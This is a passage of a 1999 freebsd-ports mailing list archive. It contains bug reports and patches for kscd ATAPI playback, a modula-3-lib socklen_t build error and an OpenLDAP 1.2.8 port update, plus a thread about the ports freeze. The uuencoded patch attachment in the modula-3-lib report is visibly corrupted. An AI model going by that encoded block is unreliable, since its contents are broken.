of the message From owner-freebsd-ports Mon Dec 20 11:26: 3 1999 Delivered-To: freebsd-ports@freebsd.org Received: from freefall.freebsd.org (freefall.FreeBSD.ORG [204.216.27.21]) by hub.freebsd.org (Postfix) with ESMTP id CD83C14BD8; Mon, 20 Dec 1999 11:26:01 -0800 (PST) (envelope-from cpiazza@FreeBSD.org) Received: (from cpiazza@localhost) by freefall.freebsd.org (8.9.3/8.9.2) id LAA50158; Mon, 20 Dec 1999 11:26:01 -0800 (PST) (envelope-from cpiazza@FreeBSD.org) Date: Mon, 20 Dec 1999 11:26:01 -0800 (PST) From: Message-Id: <199912201926.LAA50158@freefall.freebsd.org> To: cpiazza@FreeBSD.org, ports@FreeBSD.org, freebsd-ports@FreeBSD.org Subject: Re: ports/12666: New port: kcd-4.7.10 Sender: owner-freebsd-ports@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org Synopsis: New port: kcd-4.7.10 Responsible-Changed-From-To: ports->freebsd-ports Responsible-Changed-By: cpiazza Responsible-Changed-When: Mon Dec 20 11:25:47 PST 1999 Responsible-Changed-Why: freebsd-ports is preferred over ports To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-ports" in the body of the message From owner-freebsd-ports Mon Dec 20 11:26: 5 1999 Delivered-To: freebsd-ports@freebsd.org Received: from freefall.freebsd.org (freefall.FreeBSD.ORG [204.216.27.21]) by hub.freebsd.org (Postfix) with ESMTP id CD83C14BD8; Mon, 20 Dec 1999 11:26:01 -0800 (PST) (envelope-from cpiazza@FreeBSD.org) Received: (from cpiazza@localhost) by freefall.freebsd.org (8.9.3/8.9.2) id LAA50158; Mon, 20 Dec 1999 11:26:01 -0800 (PST) (envelope-from cpiazza@FreeBSD.org) Date: Mon, 20 Dec 1999 11:26:01 -0800 (PST) From: Message-Id: <199912201926.LAA50158@freefall.freebsd.org> To: cpiazza@FreeBSD.org, ports@FreeBSD.org, freebsd-ports@FreeBSD.org Subject: Re: ports/12666: New port: kcd-4.7.10 Sender: owner-freebsd-ports@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org Synopsis: New port: kcd-4.7.10 Responsible-Changed-From-To: ports->freebsd-ports Responsible-Changed-By: cpiazza Responsible-Changed-When: Mon Dec 20 11:25:47 PST 1999 Responsible-Changed-Why: freebsd-ports is preferred over ports To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-ports" in the body of the message From owner-freebsd-ports Mon Dec 20 14:30: 8 1999 Delivered-To: freebsd-ports@freebsd.org Received: from freefall.freebsd.org (freefall.FreeBSD.ORG [204.216.27.21]) by hub.freebsd.org (Postfix) with ESMTP id 7A78B15082 for ; Mon, 20 Dec 1999 14:30:02 -0800 (PST) (envelope-from gnats@FreeBSD.org) Received: (from gnats@localhost) by freefall.freebsd.org (8.9.3/8.9.2) id OAA69511; Mon, 20 Dec 1999 14:30:02 -0800 (PST) (envelope-from gnats@FreeBSD.org) Received: from sasknow.com (h139-142-245-96.ss.fiberone.net [139.142.245.96]) by hub.freebsd.org (Postfix) with ESMTP id A0CED14EAE for ; Mon, 20 Dec 1999 14:23:44 -0800 (PST) (envelope-from root@sasknow.com) Received: (from root@localhost) by sasknow.com (8.9.3/8.9.3) id QAA31528; Mon, 20 Dec 1999 16:24:23 -0600 (CST) (envelope-from root) Message-Id: <199912202224.QAA31528@sasknow.com> Date: Mon, 20 Dec 1999 16:24:23 -0600 (CST) From: ryan@sasknow.com Reply-To: ryan@sasknow.com To: FreeBSD-gnats-submit@freebsd.org X-Send-Pr-Version: 3.2 Subject: ports/15594: kscd-1.2.7 in -STABLE ports not playing ATAPI CDs Sender: owner-freebsd-ports@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org >Number: 15594 >Category: ports >Synopsis: kscd-1.2.7 in -STABLE ports not playing ATAPI CDs >Confidential: no >Severity: non-critical >Priority: medium >Responsible: freebsd-ports >State: open >Quarter: >Keywords: >Date-Required: >Class: sw-bug >Submitter-Id: current-users >Arrival-Date: Mon Dec 20 14:30:01 PST 1999 >Closed-Date: >Last-Modified: >Originator: Ryan Thompson >Release: >Organization: >Environment: Nothing special, problem appears to affect more than just myself. Using /dev/acd0[a|c] See description. >Description: When attempting to play ATAPI CDs, or to advance/rewind/pause/play CDs started with cdcontrol, kscd displays an "Ejected" message in its window and stops playback. (But does not eject the disc) >How-To-Repeat: Appears to affect all ATAPI CDROMs that I have tested; try and play one. >Fix: I've successfully used the following small patches on kscd-1.2.7, which have appeared to correct playback on my -STABLE system, without any adverse side effects. These patches were obtained from a KDE mailing list archive, and have been around for quite some time. *** plat_freebsd.c Mon May 17 14:07:34 1999 *************** *** 248,258 **** break; case CD_AS_PLAY_COMPLETED: ! *mode = TRACK_DONE; /* waiting for next track. */ break; case CD_AS_NO_STATUS: ! case 0: *mode = STOPPED; break; } --- 248,259 ---- break; case CD_AS_PLAY_COMPLETED: ! *mode = STOPPED; ! /* *mode = TRACK_DONE; /* waiting for next track. */ break; case CD_AS_NO_STATUS: ! case CD_AS_AUDIO_INVALID: *mode = STOPPED; break; } *************** *** 368,378 **** msf.end_s = (end % (60*75)) / 75; msf.end_f = end % 75; if (ioctl(d->fd, CDIOCSTART)) return (-1); ! if (ioctl(d->fd, CDIOCPLAYMSF, &msf)) ! return (-2); return (0); } --- 369,383 ---- msf.end_s = (end % (60*75)) / 75; msf.end_f = end % 75; + #if 0 if (ioctl(d->fd, CDIOCSTART)) return (-1); + #endif ! if (ioctl(d->fd, CDIOCPLAYMSF, &msf)) { ! perror("ioctl(CDIOPLAYMSF)"); ! return (-2); ! } return (0); } >Release-Note: >Audit-Trail: >Unformatted: >release: FreeBSD 3.4-STABLE i386 To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-ports" in the body of the message From owner-freebsd-ports Mon Dec 20 14:50:15 1999 Delivered-To: freebsd-ports@freebsd.org Received: from freefall.freebsd.org (freefall.FreeBSD.ORG [204.216.27.21]) by hub.freebsd.org (Postfix) with ESMTP id 227801535F for ; Mon, 20 Dec 1999 14:50:02 -0800 (PST) (envelope-from gnats@FreeBSD.org) Received: (from gnats@localhost) by freefall.freebsd.org (8.9.3/8.9.2) id OAA71712; Mon, 20 Dec 1999 14:50:02 -0800 (PST) (envelope-from gnats@FreeBSD.org) Received: from kbtfw.kubota.co.jp (kbtfw.kubota.co.jp [133.253.102.202]) by hub.freebsd.org (Postfix) with ESMTP id 04DE5153CD for ; Mon, 20 Dec 1999 14:46:06 -0800 (PST) (envelope-from haro@tk.kubota.co.jp) Received: by kbtfw.kubota.co.jp; id HAA03374; Tue, 21 Dec 1999 07:46:04 +0900 (JST) Received: from unknown(133.253.31.1) by kbtfw.kubota.co.jp via smap (V4.2) id xma003313; Tue, 21 Dec 99 07:45:21 +0900 Received: (from uucp@localhost) by lemond.gkn.kubota.co.jp (8.9.3+3.2W/3.7W99070916) with UUCP id HAA17431 for FreeBSD-gnats-submit@freebsd.org; Tue, 21 Dec 1999 07:45:20 +0900 (JST) Received: (from haro@localhost) by jkpc15.tk.kubota.co.jp (8.9.3/3.7W-uucp) id AAA00540; Tue, 21 Dec 1999 00:26:41 +0900 (JST) Message-Id: <199912201526.AAA00540@jkpc15.tk.kubota.co.jp> Date: Tue, 21 Dec 1999 00:26:41 +0900 (JST) From: haro@kubota.co.jp Reply-To: haro@kubota.co.jp To: FreeBSD-gnats-submit@freebsd.org X-Send-Pr-Version: 3.2 Subject: ports/15595: modula-3-lib compile error on -CURRENT due to changes in socket.h Sender: owner-freebsd-ports@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org >Number: 15595 >Category: ports >Synopsis: modula-3-lib compile error on -CURRENT due to changes in socket.h >Confidential: no >Severity: serious >Priority: medium >Responsible: freebsd-ports >State: open >Quarter: >Keywords: >Date-Required: >Class: sw-bug >Submitter-Id: current-users >Arrival-Date: Mon Dec 20 14:50:01 PST 1999 >Closed-Date: >Last-Modified: >Originator: Munehiro Matsuda >Release: FreeBSD 4.0-CURRENT i386 (After Nov 24 1999) >Organization: Kubota Corporation, Japan >Environment: OS: FreeBSD 4.0-CURRENT as of Dec 17 1999 (CTM: src-cur.4142.gz) ports: ports-cur as of Dec 18 1999 (CTM: ports-cur.3094.gz) >Description: modula-3-lib port fails compile with the following error: ============================================================================ mkdir FreeBSD2 --- building in FreeBSD2 --- m3 -w1 -why -O -times -a libm3core.a -F/var/tmp/qkGu1836 new source -> compiling ../src/Csupport/Common/hand.c <> new source -> compiling ../src/runtime/FreeBSD2/RTHeapDepC.c ../src/runtime/FreeBSD2/RTHeapDepC.c: In function `getsockopt': ../src/runtime/FreeBSD2/RTHeapDepC.c:529: argument `optlen' doesn't match prototype /usr/include/sys/socket.h:427: prototype declaration ../src/runtime/FreeBSD2/RTHeapDepC.c: In function `setsockopt': ../src/runtime/FreeBSD2/RTHeapDepC.c:1105: argument `optlen' doesn't match prototype /usr/include/sys/socket.h:437: prototype declaration <> new source -> compiling ../src/runtime/FreeBSD2/_fpsetjmp.s compilation failed => not building library "libm3core.a" seconds #times operation 0.04 1 updating web info 0.23 1 getting derived timestamps 0.10 210 checking timestamps 0.11 181 merging new link info 11.02 180 compiling Modula-3 -> IL 45.04 180 compiling IL -> assembly 38.44 180 compiling assembly -> object 11.47 30 compiling C -> object 0.11 1 exhaling new link info 7.36 361 removing temporary files 0.16 other --------------------------------------------------- 114.07 TOTAL *** error code 1 (ignored) missing libm3core.a: not building libm3core.so.6 --- shipping from FreeBSD2 --- m3mkdir /usr/ports/lang/modula-3-lib/work/installed/lib/m3/pkg/m3core/FreeBSD2 mkdir /usr/ports/lang/modula-3-lib/work/installed/lib/m3/pkg/m3core mkdir /usr/ports/lang/modula-3-lib/work/installed/lib/m3/pkg/m3core/FreeBSD2 /usr/ports/lang/modula-3-lib/work/installed/lib/m3/pkg/m3core/FreeBSD2 .M3EXPORTS .M3IMPTAB .M3WEB libm3core.a install: libm3core.a: No such file or directory *** error code 71 "/usr/ports/lang/modula-3-lib/work/m3/m3core/FreeBSD2/.M3SHIP", line 328: command execute failed *** call stack *** "/usr/ports/lang/modula-3-lib/work/m3/m3core/FreeBSD2/.M3SHIP", line 328: call to built-in exec "/usr/ports/lang/modula-3-lib/work/m3/m3core/FreeBSD2/.M3SHIP", line 6: call to procedure install_file m3ship: /usr/ports/lang/modula-3-lib/work/installed/bin/quake failed (status = 256) *** error code 255 "/usr/ports/lang/modula-3-lib/work/m3/src/m3makefile", line 61: command execute failed *** call stack *** "/usr/ports/lang/modula-3-lib/work/m3/src/m3makefile", line 61: call to built-in exec "/usr/ports/lang/modula-3-lib/work/m3/src/m3makefile", line 84: call to procedure BuildChunk m3build: /usr/ports/lang/modula-3-lib/work/installed/bin/quake failed (status = 256) *** Error code 255 Stop in /usr/ports/lang/modula-3-lib. *** Error code 1 Stop in /usr/ports/lang/modula-3-lib. *** Error code 1 Stop in /usr/ports/lang/modula-3-lib. ============================================================================ The error occurs due to changes of definitions for getsockopt() and setsockopt() in sys/sys/socket.h (rev: 1.34). From: int getsockopt __P((int, int, int, void *, int *)); int setsockopt __P((int, int, int, const void *, int)); To: int getsockopt __P((int, int, int, void *, socklen_t *)); int setsockopt __P((int, int, int, const void *, socklen_t)); >How-To-Repeat: On -CURRENT after Nov 24 1999, # cd /usr/ports/lang/modula-3-lib # make >Fix: Replace the /usr/ports/lang/modula-3-lib/patches/patch-ab with the fixed one, included in this PR. The fix is something like: int setsockopt(s, level, optname, optval, optlen) /* ok */ int s, level, optname; const void *optval; + #if __FreeBSD__ >= 4 + socklen_t optlen; + #else int optlen; + #endif begin 644 patch-ab M1FEX(&$@8V]N"!S;VUE('1H:6YG7!E7,O<&%R86TN:#X*("-I9B!?7T9R965"4T1?7R`^ M/2`R"BTC(&EN8VQU9&4@/'-Y7-C=&PN:#X**R-I;F-L=61E(#QS>7,O M7,O;6]U;G0N:#X*("-I;F-L=61E(#QS>7,O:7!C+F@^"D!` M("TX.2PY("LY,"PR,2!`0`H@(VEN8VQU9&4@/'5F7,OR!I;G0@R!I;G0@R!I;G0@7-C86QL M*%-94U]C;VYN96-T+"!S+"!N86UE+"!N86UE;&5N*3L*+2`@15A)5%]#4DE4 M24-!3#L*+2`@R!C:&%R("HJ93L@9F]R("AE(#T@96YV<#L@*F4[(&4K*RD@34%+ M15]214%$04),12@J92D[('T**R`@("`@('L@8VAAR!C:&%R("H@8V]NR!I;G0@ M7-C86QL*%-94U]G971P965R;F%M92P@R!I;G0@7-C M86QL*%-94U]G971S;V-K;F%M92P@7!E M+"!O<'1I;VYS*0HM8VAA7!E.PHM8VAA7!E.PHK("!C;VYS="!C:&%R("ID:7(["BL@(&EN="!F M;&%G7!E+"`B;69S(BD@/3T@,"D@>PHK("`@(&U?9&%T82`]("AS=')U8W0@;69S M7V%R9W,J*2!D871A.PHK("`@($U!2T5?4D5!1$%"3$4H;5]D871A*3L**R`@ M("!-04M%7U)%041!0DQ%*&U?9&%T82T^9G-P96,I.PHK("`@(')E7!E+"!D:7(L(&9L86=S+"!D871A*3L* M*R`@?2!E;'-E(&EF("AS=')C;7`H='EP92P@(FYFPDO*B!.;W0@86YY=&AI;F<@=V4@F5? M="!N8GET97,["BU[(&EN="!R97-U;'0["BT*+2`@14Y415)?0U))5$E#04P[ M"BT@($U!2T5?5U))5$%"3$4H8G5F*3L*+2`@CL*('L@:6YT(')EF5? M="!L96X["BTC96QS90HM:6YT(&QE;CL*+2-E;F1I9@HM:6YT(&9L86=S.PHM M>R!I;G0@F5? M="!L96X["BTC96QS90HM:6YT(&QE;CL*+2-E;F1I9@HM:6YT(&9L86=S.PHM MR!I;G0@ MR!I;G0@R!I;G0@&-E<'1F9',I.PHM("!-04M%7U)%041!0DQ%*'1I;65O=70I.PHM("!R97-U M;'0@/2!S>7-C86QL*%-94U]S96QE8W0L(&YF9',L(')E861F9',L('=R:71E M9F1S+"!E>&-E<'1F9',L('1I;65O=70I.PHM("!%6$E47T-2251)0T%,.PHM M("!R971UR!I;G0@F5?="!L96X["BTC96QS90HM:6YT(&QE;CL*+2-E M;F1I9@HM:6YT(&9L86=S.PHM>R!I;G0@7-C86QL*%-94U]S96YD=&\L(',L(&US9RP@;&5N+"!F;&%GR!I;G0@7!E+"!P7!E+"!PR!I;G0@7-C86QL*%-94U]TR!I;G0@71ERelease-Note: >Audit-Trail: >Unformatted: To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-ports" in the body of the message From owner-freebsd-ports Mon Dec 20 15:35:31 1999 Delivered-To: freebsd-ports@freebsd.org Received: from freefall.freebsd.org (freefall.FreeBSD.ORG [204.216.27.21]) by hub.freebsd.org (Postfix) with ESMTP id 18EA615175; Mon, 20 Dec 1999 15:35:30 -0800 (PST) (envelope-from cwt@FreeBSD.org) Received: (from cwt@localhost) by freefall.freebsd.org (8.9.3/8.9.2) id PAA75970; Mon, 20 Dec 1999 15:35:30 -0800 (PST) (envelope-from cwt@FreeBSD.org) Date: Mon, 20 Dec 1999 15:35:30 -0800 (PST) From: Message-Id: <199912202335.PAA75970@freefall.freebsd.org> To: cwt@FreeBSD.org, freebsd-ports@FreeBSD.org, jdp@FreeBSD.org Subject: Re: ports/15595: modula-3-lib compile error on -CURRENT due to changes in socket.h Sender: owner-freebsd-ports@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org Synopsis: modula-3-lib compile error on -CURRENT due to changes in socket.h Responsible-Changed-From-To: freebsd-ports->jdp Responsible-Changed-By: cwt Responsible-Changed-When: Mon Dec 20 15:34:08 PST 1999 Responsible-Changed-Why: jdp responsible for m3 ports To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-ports" in the body of the message From owner-freebsd-ports Mon Dec 20 19: 5:31 1999 Delivered-To: freebsd-ports@freebsd.org Received: from cx587235-a.chnd1.az.home.com (cx587235-a.chnd1.az.home.com [24.11.88.170]) by hub.freebsd.org (Postfix) with ESMTP id 7A21C14DEC for ; Mon, 20 Dec 1999 19:05:29 -0800 (PST) (envelope-from jjreynold@home.com) Received: from whale.home-net (whale [192.168.1.2]) by cx587235-a.chnd1.az.home.com (8.9.3/8.9.3) with ESMTP id UAA56724 for ; Mon, 20 Dec 1999 20:05:28 -0700 (MST) (envelope-from jjreynold@home.com) Received: (from jjreynold@localhost) by whale.home-net (8.9.3/8.9.3) id UAA18638; Mon, 20 Dec 1999 20:05:28 -0700 (MST) (envelope-from jjreynold@home.com) From: John and Jennifer Reynolds MIME-Version: 1.0 Content-Type: text/plain; charset=us-ascii Content-Transfer-Encoding: 7bit Message-ID: <14430.61047.55054.513267@whale.home-net> Date: Mon, 20 Dec 1999 20:05:27 -0700 (MST) To: ports@freebsd.org Subject: is the ports tree frozen? X-Mailer: VM 6.73 under Emacs 20.4.1 Cc: Sender: owner-freebsd-ports@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org Hi all, Is the ports tree still currently frozen? I didn't see the message go by, but I'm sure that in preparation for 3.4-RELEASE hitting the door that commits to ports had to be frozen, but is it still? I haven't seen changes via cvsup to ports in days (and the last message in cvs-all regarding something change in ports was 12/17). Just wondering "what was up" ... -Jr -- =-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-= John Reynolds Chandler Capabilities Engineering, CDS, Intel Corporation jreynold@sedona.ch.intel.com My opinions are mine, not Intel's. Running jjreynold@home.com FreeBSD 3.4-STABLE. FreeBSD: The Power to Serve. http://members.home.com/jjreynold/ Come join us!!! @ http://www.FreeBSD.org/ =-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-= To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-ports" in the body of the message From owner-freebsd-ports Mon Dec 20 19: 9: 4 1999 Delivered-To: freebsd-ports@freebsd.org Received: from mail.HiWAAY.net (fly.HiWAAY.net [208.147.154.56]) by hub.freebsd.org (Postfix) with ESMTP id 7D3D914EF4 for ; Mon, 20 Dec 1999 19:09:00 -0800 (PST) (envelope-from sprice@hiwaay.net) Received: from localhost (sprice@localhost) by mail.HiWAAY.net (8.9.3/8.9.0) with ESMTP id VAA17097; Mon, 20 Dec 1999 21:08:58 -0600 (CST) Date: Mon, 20 Dec 1999 21:08:58 -0600 (CST) From: Steve Price To: John and Jennifer Reynolds Cc: ports@FreeBSD.ORG Subject: Re: is the ports tree frozen? In-Reply-To: <14430.61047.55054.513267@whale.home-net> Message-ID: MIME-Version: 1.0 Content-Type: TEXT/PLAIN; charset=US-ASCII Sender: owner-freebsd-ports@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org Yes it is still frozen. It should thaw out in the next day or so, if not sooner. -steve On Mon, 20 Dec 1999, John and Jennifer Reynolds wrote: # # Hi all, # # Is the ports tree still currently frozen? I didn't see the message go by, but # I'm sure that in preparation for 3.4-RELEASE hitting the door that commits to # ports had to be frozen, but is it still? # # I haven't seen changes via cvsup to ports in days (and the last message in # cvs-all regarding something change in ports was 12/17). # # Just wondering "what was up" ... # # -Jr # # -- # =-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-= # John Reynolds Chandler Capabilities Engineering, CDS, Intel Corporation # jreynold@sedona.ch.intel.com My opinions are mine, not Intel's. Running # jjreynold@home.com FreeBSD 3.4-STABLE. FreeBSD: The Power to Serve. # http://members.home.com/jjreynold/ Come join us!!! @ http://www.FreeBSD.org/ # =-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-= To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-ports" in the body of the message From owner-freebsd-ports Mon Dec 20 19:12:19 1999 Delivered-To: freebsd-ports@freebsd.org Received: from cx587235-a.chnd1.az.home.com (cx587235-a.chnd1.az.home.com [24.11.88.170]) by hub.freebsd.org (Postfix) with ESMTP id 1BE3E14BC9 for ; Mon, 20 Dec 1999 19:12:18 -0800 (PST) (envelope-from jjreynold@home.com) Received: from whale.home-net (whale [192.168.1.2]) by cx587235-a.chnd1.az.home.com (8.9.3/8.9.3) with ESMTP id UAA56738; Mon, 20 Dec 1999 20:12:16 -0700 (MST) (envelope-from jjreynold@home.com) Received: (from jjreynold@localhost) by whale.home-net (8.9.3/8.9.3) id UAA36648; Mon, 20 Dec 1999 20:12:16 -0700 (MST) (envelope-from jjreynold@home.com) From: John and Jennifer Reynolds MIME-Version: 1.0 Content-Type: text/plain; charset=us-ascii Content-Transfer-Encoding: 7bit Message-ID: <14430.61455.972792.661331@whale.home-net> Date: Mon, 20 Dec 1999 20:12:15 -0700 (MST) To: Steve Price Cc: John and Jennifer Reynolds , ports@FreeBSD.ORG Subject: Re: is the ports tree frozen? In-Reply-To: References: <14430.61047.55054.513267@whale.home-net> X-Mailer: VM 6.73 under Emacs 20.4.1 Cc: Sender: owner-freebsd-ports@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org [ On Monday, December 20, Steve Price wrote: ] > Yes it is still frozen. It should thaw out in the next day > or so, if not sooner. > OK, thanks. I was just curious. I don't subscribe to ports simply due to the volume (I'd have to quit my job to track -questions, -stable, -emulation, *and* -ports :) ... thanks for the info, -Jr -- =-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-= John Reynolds Chandler Capabilities Engineering, CDS, Intel Corporation jreynold@sedona.ch.intel.com My opinions are mine, not Intel's. Running jjreynold@home.com FreeBSD 3.4-STABLE. FreeBSD: The Power to Serve. http://members.home.com/jjreynold/ Come join us!!! @ http://www.FreeBSD.org/ =-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-= To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-ports" in the body of the message From owner-freebsd-ports Mon Dec 20 22: 0:12 1999 Delivered-To: freebsd-ports@freebsd.org Received: from freefall.freebsd.org (freefall.FreeBSD.ORG [204.216.27.21]) by hub.freebsd.org (Postfix) with ESMTP id D9B82153DE for ; Mon, 20 Dec 1999 22:00:02 -0800 (PST) (envelope-from gnats@FreeBSD.org) Received: (from gnats@localhost) by freefall.freebsd.org (8.9.3/8.9.2) id WAA10824; Mon, 20 Dec 1999 22:00:02 -0800 (PST) (envelope-from gnats@FreeBSD.org) Received: from angmar.mel.vet.com.au (angmar.mel.cybec.com.au [203.103.154.62]) by hub.freebsd.org (Postfix) with ESMTP id D66FE15157 for ; Mon, 20 Dec 1999 21:52:19 -0800 (PST) (envelope-from lodea@angmar.mel.vet.com.au) Received: (from lodea@localhost) by angmar.mel.vet.com.au (8.9.3/8.9.3) id SAA16601; Mon, 20 Dec 1999 18:38:47 +1100 (EST) Message-Id: <199912200738.SAA16601@angmar.mel.vet.com.au> Date: Mon, 20 Dec 1999 18:38:47 +1100 (EST) From: lodea@angmar.mel.vet.com.au Reply-To: lodea@angmar.mel.vet.com.au To: FreeBSD-gnats-submit@freebsd.org X-Send-Pr-Version: 3.2 Subject: ports/15599: OpenLDAP 1.2.8 released Sender: owner-freebsd-ports@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org >Number: 15599 >Category: ports >Synopsis: OpenLDAP 1.2.8 released >Confidential: no >Severity: non-critical >Priority: low >Responsible: freebsd-ports >State: open >Quarter: >Keywords: >Date-Required: >Class: change-request >Submitter-Id: current-users >Arrival-Date: Mon Dec 20 22:00:01 PST 1999 >Closed-Date: >Last-Modified: >Originator: Lachlan O'Dea >Release: FreeBSD 3.3-STABLE i386 >Organization: Computer Associates >Environment: >Description: Update the OpenLDAP port from 1.2.7 to 1.2.8. I've removed both the patch files. patch-ab was the right thing, but it's better to use CONFIGURE_ARGS. I asked OpenLDAP about patch-aa (a hack for Netscape 4.5). They said they hadn't included it because it was Netscape that was doing the wrong thing and the patch might break correct clients. So I don't think this belongs in the port, unless it can be made optional somehow. If you want this patch included, I think the best solution would be to get the OpenLDAP guys to make it an option to configure. Someone seems to have been messing with this port: all of the conf files have been added to PLIST. I don't know about you, but I don't like pkg_delete unlinking all of my carefully constructed configuration files. >How-To-Repeat: >Fix: diff -ruN openldap.orig/Makefile openldap/Makefile --- openldap.orig/Makefile Tue Oct 26 11:54:21 1999 +++ openldap/Makefile Mon Dec 20 17:41:34 1999 @@ -1,12 +1,12 @@ # New ports collection makefile for: openldap -# Version required: 1.2.7 +# Version required: 1.2.8 # Date created: 20 Sep 1998 # Whom: Lachlan O'Dea # # $FreeBSD: ports/net/openldap/Makefile,v 1.9 1999/10/26 01:54:21 mharo Exp $ # -DISTNAME= openldap-1.2.7 +DISTNAME= openldap-1.2.8 CATEGORIES= net databases MASTER_SITES= ftp://ftp.OpenLDAP.org/pub/OpenLDAP/openldap-release/ \ ftp://ftp.net.lut.ac.uk/openldap/openldap-release/ \ @@ -21,8 +21,8 @@ MAINTAINER= ulmo@earthling.net -WRKSRC= ${WRKDIR}/ldap GNU_CONFIGURE= yes +CONFIGURE_ARGS= --prefix=${PREFIX} --localstatedir=/var/run .include .include "${FILESDIR}/manpages" diff -ruN openldap.orig/files/md5 openldap/files/md5 --- openldap.orig/files/md5 Tue Oct 26 11:54:22 1999 +++ openldap/files/md5 Mon Dec 20 17:21:02 1999 @@ -1 +1 @@ -MD5 (openldap-1.2.7.tgz) = be5866cfa50fdf083f5230b3837181e8 +MD5 (openldap-1.2.8.tgz) = aa2b56cb5947721757aecab2e85b801d diff -ruN openldap.orig/patches/patch-aa openldap/patches/patch-aa --- openldap.orig/patches/patch-aa Wed Oct 27 18:27:11 1999 +++ openldap/patches/patch-aa Thu Jan 1 10:00:00 1970 @@ -1,20 +0,0 @@ ---- servers/slapd/add.c.orig Fri Jan 29 00:11:49 1999 -+++ servers/slapd/add.c Sat Oct 23 13:31:43 1999 -@@ -180,6 +180,9 @@ - bv.bv_len = strlen( bv.bv_val ); - } - attr_merge( e, "creatorsname", bvals ); -+ /* Netscape Communicator 4.5 seems to expect modification information -+ to be present within newly created items. */ -+ attr_merge( e, "modifiersname", bvals ); - - ldap_pvt_thread_mutex_lock( ¤ttime_mutex ); - #ifndef LDAP_LOCALTIME -@@ -194,4 +197,7 @@ - bv.bv_val = buf; - bv.bv_len = strlen( bv.bv_val ); - attr_merge( e, "createtimestamp", bvals ); -+ /* Netscape Communicator 4.5 seems to expect modification information -+ to be present within newly created items. */ -+ attr_merge( e, "modifytimestamp", bvals ); - } diff -ruN openldap.orig/patches/patch-ab openldap/patches/patch-ab --- openldap.orig/patches/patch-ab Mon Nov 1 12:35:16 1999 +++ openldap/patches/patch-ab Thu Jan 1 10:00:00 1970 @@ -1,11 +0,0 @@ ---- configure.orig Mon Nov 1 09:24:55 1999 -+++ configure Mon Nov 1 09:25:14 1999 -@@ -112,7 +112,7 @@ - datadir='${prefix}/share' - sysconfdir='${prefix}/etc' - sharedstatedir='${prefix}/com' --localstatedir='${prefix}/var' -+localstatedir='/var/run' - libdir='${exec_prefix}/lib' - includedir='${prefix}/include' - oldincludedir='/usr/include' diff -ruN openldap.orig/pkg/PLIST openldap/pkg/PLIST --- openldap.orig/pkg/PLIST Mon Nov 1 12:03:44 1999 +++ openldap/pkg/PLIST Mon Dec 20 17:59:17 1999 @@ -5,19 +5,12 @@ bin/ldappasswd bin/ldapsearch bin/ud -etc/openldap/ldap.conf etc/openldap/ldap.conf.default -etc/openldap/ldapfilter.conf etc/openldap/ldapfilter.conf.default -etc/openldap/ldapsearchprefs.conf etc/openldap/ldapsearchprefs.conf.default -etc/openldap/ldaptemplates.conf etc/openldap/ldaptemplates.conf.default -etc/openldap/slapd.at.conf etc/openldap/slapd.at.conf.default -etc/openldap/slapd.conf etc/openldap/slapd.conf.default -etc/openldap/slapd.oc.conf etc/openldap/slapd.oc.conf.default include/disptmpl.h include/lber.h @@ -49,5 +42,4 @@ share/openldap/go500gw.help share/openldap/ldapfriendly share/openldap/rcpt500.help -@dirrm etc/openldap @dirrm share/openldap >Release-Note: >Audit-Trail: >Unformatted: To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-ports" in the body of the message From owner-freebsd-ports Tue Dec 21 0:30: 3 1999 Delivered-To: freebsd-ports@freebsd.org Received: from freefall.freebsd.org (freefall.FreeBSD.ORG [204.216.27.21]) by hub.freebsd.org (Postfix) with ESMTP id 0509614F7D for ; Tue, 21 Dec 1999 00:30:01 -0800 (PST) (envelope-from gnats@FreeBSD.org) Received: (from gnats@localhost) by freefall.freebsd.org (8.9.3/8.9.2) id AAA25534; Tue, 21 Dec 1999 00:30:00 -0800 (PST) (envelope-from gnats@FreeBSD.org) Received: from icc.surw.chel.su (surw.chel.su [195.54.2.162]) by hub.freebsd.org (Postfix) with ESMTP id BF1DB14D9D for ; Tue, 21 Dec 1999 00:26:32 -0800 (PST) (envelope-from andy@icc.surw.chel.su) Received: (from andy@localhost) by icc.surw.chel.su (8.9.3/8.9.3) id LAA08447; Tue, 21 Dec 1999 11:26:26 +0300 (MSK) (envelope-from andy) Message-Id: <199912210826.LAA08447@icc.surw.chel.su> Date: Tue, 21 Dec 1999 11:26:26 +0300 (MSK) From: Andrey Zakhvatov Reply-To: andy@icc.surw.chel.su To: FreeBSD-gnats-submit@freebsd.org X-Send-Pr-Version: 3.2 Subject: ports/15602: Update port: editors/gedit Sender: owner-freebsd-ports@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org >Number: 